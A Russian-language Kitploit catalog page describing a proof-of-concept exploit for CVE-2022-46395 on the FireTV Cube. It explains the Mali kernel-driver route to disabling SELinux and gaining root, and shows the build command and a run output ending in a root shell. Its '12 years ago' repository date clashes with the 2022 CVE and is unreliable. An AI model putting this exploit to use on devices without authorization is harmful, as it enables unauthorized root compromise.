Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE_2022_46395_Gazelle — CVE-2022-46395 POC для FireTV 3rd gen Cube (gazelle) | Kitploit
Инструменты/GitHubGitHub/pro-me3us/cve_2022_46395_gazelle
Безопасность AndroidБезопасность встроенных системПовышение привилегийЭксплуатацияЭксплуатация Бинарных Файлов
GitHubpro-me3us/cve_2022_46395_gazelle

CVE_2022_46395_Gazelle

CVE-2022-46395 POC для FireTV 3rd gen Cube (gazelle)

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт для CVE-2022-46395 для запуска на FireTV 3-го поколения Cube

Это ответвление от Pixel 6 POC исследователя безопасности Man Yue Mo для CVE-2022-46395. Прочитайте его подробное описание уязвимости здесь. Были внесены изменения для учёта 32-битного пользовательского пространства FireOS. POC использует ошибку в драйвере ядра ARM Mali для получения произвольного выполнения кода ядра, которое затем используется для отключения SELinux и получения root.

Эксплойт был исправлен в PS7664/3772 (сентябрь 2023). Для справки, следующая команда использовалась для компиляции с clang в ndk-21:

root@kitploit:~
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o gazelle_buf

Для достижения наилучших результатов запускайте после свежей перезагрузки. В среднем POC занимает 20-60 секунд для получения root.

root@kitploit:~
gazelle:/ $ /data/local/tmp/gazelle_buf
fingerprint: Amazon/gazelle/gazelle:9/PS7652.3564N/0028488625152:user/amz-p,release-keys
benchmark_time 102
failed after 100
finished reset: 919423975 fault: 918468559 3795 err 0 read 3
found pgd at page 8
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
success after 128
gazelle:/ # 
Скачать инструмент